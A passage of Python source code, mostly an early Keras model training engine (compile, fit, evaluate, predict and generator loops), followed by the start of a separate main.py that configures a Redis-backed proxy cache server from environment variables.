sample_weights.append(weight)
elif type(sample_weight_mode) is list:
if len(sample_weight_mode) != len(self.outputs):
raise Exception('When passing a list as sample_weight_mode, ' +
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal' for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape), name=name + '_target'))
# prepare metrics
self.metrics = metrics
self.metrics_names = ['loss']
self.metrics_tensors = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics_tensors.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties to the loss
for r in self.regularizers:
total_loss = r(total_loss)
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
def append_metric(layer_num, metric_name, metric_tensor):
"""Helper function, used in loop below"""
if len(self.output_names) > 1:
metric_name = self.output_layers[layer_num].name + '_' + metric_name
self.metrics_names.append(metric_name)
self.metrics_tensors.append(metric_tensor)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy (because of class mode duality)
output_shape = self.internal_output_shapes[i]
acc_fn = None
if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
# case: binary accuracy
acc_fn = metrics_module.binary_accuracy
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
acc_fn = metrics_module.sparse_categorical_accuracy
else:
acc_fn = metrics_module.categorical_accuracy
append_metric(i, 'acc', acc_fn(y_true, y_pred))
else:
metric_fn = metrics_module.get(metric)
metric_result = metric_fn(y_true, y_pred)
if not isinstance(metric_result, dict):
metric_result = {
metric_fn.__name__: metric_result
}
for name, tensor in six.iteritems(metric_result):
append_metric(i, name, tensor)
# prepare gradient updates and state updates
self.optimizer = optimizers.get(optimizer)
self.total_loss = total_loss
self.sample_weights = sample_weights
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
self._collected_trainable_weights = collect_trainable_weights(self)
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise Exception('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise Exception('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True,
callback_metrics=[]):
'''Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
# Returns
`History` object.
'''
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
for epoch in range(nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) != list:
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=K.floatx()))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) == list:
if batch_index == 0:
for batch_out in enumerate(batch_outs):
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_dim=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise Exception('You must compile a model before training/testing.'
' Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(objectives, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False,
exception_prefix='model input')
y = standardize_input_data(y, self.output_names,
output_shapes,
check_batch_dim=False,
exception_prefix='model target')
sample_weights = standardize_sample_weights(sample_weight,
self.output_names)
class_weights = standardize_class_weights(class_weight,
self.output_names)
sample_weights = [standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
check_array_lengths(x, y, sample_weights)
check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=[],
validation_split=0., validation_data=None, shuffle=True,
class_weight=None, sample_weight=None):
'''Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
nb_epoch: integer, the number of times to iterate over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode. 0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate the loss and any model metrics
at the end of each epoch. The model will not be trained on this data.
This could be a tuple (x_val, y_val) or a tuple (val_x, val_y, val_sample_weights).
shuffle: boolean, whether to shuffle the training data before each epoch.
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare validation data
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y,
sample_weight=val_sample_weight,
check_batch_dim=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weights, val_sample_weights = (
slice_X(sample_weights, 0, split_at), slice_X(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# prepare input arrays and training function
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# prepare display labels
out_labels = self.metrics_names
# rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows)
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
out_labels = deduped_out_labels
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# delegate logic to _fit_loop
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
'''Returns the loss value and metrics values for the model
in test mode. Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
# validate user data
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=False,
batch_size=batch_size)
# prepare inputs, delegate logic to _test_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
'''Generates output predictions for the input samples,
processing the samples in a batched way.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple outputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A Numpy array of predictions.
'''
# validate user data
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_dim=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise Exception('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# prepare inputs, delegate logic to _predict_loop
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
'''Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
'''Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named, you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named, you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
x, y, sample_weights = self._standardize_user_data(x, y,
sample_weight=sample_weight,
check_batch_dim=True)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
'''Returns predictions for a single batch of samples.
'''
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes)
if self.uses_learning_phase and type(K.learning_phase()) is not int:
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight={}, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Fits the model on data generated batch-by-batch by
a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
nb_val_samples: only relevant if `validation_data` is a generator.
number of samples to use from validation generator
at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
wait_time = 0.01 # in seconds
epoch = 0
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
out_labels = self.metrics_names
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y, val_sample_weight) '
'or (val_x, val_y). Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
self.validation_data = val_x + [val_y, val_sample_weights]
else:
self.validation_data = None
# start generator thread storing batches into a queue
data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
callback_model.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
# build batch logs
batch_logs = {}
if type(x) is list:
batch_size = x[0].shape[0]
elif type(x) is dict:
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
try:
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
except:
_stop.set()
raise
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen > samples_per_epoch:
warnings.warn('Epoch comprised more than '
'`samples_per_epoch` samples, '
'which might affect learning results. '
'Set `samples_per_epoch` correctly '
'to avoid this warning.')
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
max_q_size=max_q_size)
else:
# no need for try/except because
# data has already been validated
val_outs = self.evaluate(val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if type(val_outs) is not list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
_stop.set()
if pickle_safe:
data_gen_queue.close()
callbacks.on_train_end()
return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Evaluates the model on a data generator. The generator should
return the same kind of data as accepted by `test_on_batch`.
Arguments:
generator:
generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
val_samples:
total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
self._make_test_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
weights = []
data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
try:
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
all_outs.append(outs)
processed_samples += nb_samples
weights.append(nb_samples)
_stop.set()
if pickle_safe:
data_gen_queue.close()
if type(outs) is not list:
return np.average(np.asarray(all_outs),
weights=weights)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=weights))
return averages
def predict_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: generator yielding batches of input samples.
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Numpy array(s) of predictions.
'''
self._make_predict_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
else:
x = generator_output
try:
outs = self.predict_on_batch(x)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
if type(outs) != list:
outs = [outs]
if len(all_outs) == 0:
for out in outs:
shape = (val_samples,) + out.shape[1:]
all_outs.append(np.zeros(shape, dtype=K.floatx()))
for i, out in enumerate(outs):
all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
processed_samples += nb_samples
_stop.set()
if pickle_safe:
data_gen_queue.close()
if len(all_outs) == 1:
return all_outs[0]
return all_outs
|
main.py | import argparse
from concurrent.futures import ThreadPoolExecutor
import os
import signal
import sys
import time
import threading
from proxycache.http_server import AsyncHTTPServer
from proxycache.lrucache import LRUCache
from proxycache.rate_limiter import Limiter
from proxycache.db import RedisKVStore
def setup_signal_handlers(server):
def signal_handler(signal, frame):
server.stop()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
def get_service_config():
try:
return(
os.environ['PROXY_HOST'],
int(os.environ['PROXY_PORT']),
int(os.environ['PROXY_MAX_KEYS']),
int(os.environ['PROXY_TTL_MS']))
except Exception:
print('Unable to find server config settings')
sys.exit(1)
def get_redis_config():
try:
return (
os.environ['REDIS_HOST'],
int(os.environ['REDIS_PORT']))
except Exception:
print('Unable to find server host/port settings')
sys.exit(1)
def main():
service_cfg = get_service_config()
redis_cfg = get_redis_config()
db = RedisKVStore(host=redis_cfg[0], port=redis_cfg[1])
cache = LRUCache(service_cfg[2], service_cfg[3], db)
